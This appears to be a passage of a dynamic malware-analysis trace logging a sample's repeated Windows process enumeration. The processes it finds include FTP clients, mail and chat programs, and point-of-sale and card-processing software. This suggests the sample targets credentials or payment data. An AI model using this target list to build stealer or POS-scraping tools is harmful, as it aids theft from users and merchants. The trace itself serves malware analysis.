returned 1 [0288.320] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0288.321] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0288.322] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0288.358] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0288.359] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0288.361] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0288.362] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0288.363] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0288.365] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0288.367] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0288.368] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0288.369] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0288.374] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0288.376] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0288.378] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0288.379] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0288.381] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0288.383] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0288.385] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0288.386] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0288.391] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0288.393] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0288.394] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0288.396] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0288.398] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0288.399] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0288.401] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0288.487] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0288.489] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0288.491] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0288.492] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0288.494] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0288.496] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0288.500] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0288.502] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0288.503] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0288.505] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0288.507] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0288.508] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0288.510] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0288.511] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0288.513] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0288.515] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0288.517] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0288.519] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0288.520] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0288.522] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0288.523] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0288.525] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0288.526] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0288.544] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0288.545] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0288.547] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0288.548] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0288.550] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0288.551] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0288.553] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0288.554] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0288.556] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0288.557] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0288.559] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0288.561] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0288.562] CloseHandle (hObject=0x2170) returned 1 [0288.562] Sleep (dwMilliseconds=0x64) [0288.668] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0288.679] Process32First (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.681] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0288.682] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0288.684] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0288.685] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0288.687] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0288.689] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0288.690] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0288.692] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0288.693] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.694] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.696] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0288.697] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.699] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.704] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.706] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.707] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.709] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.710] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.712] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0288.713] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, 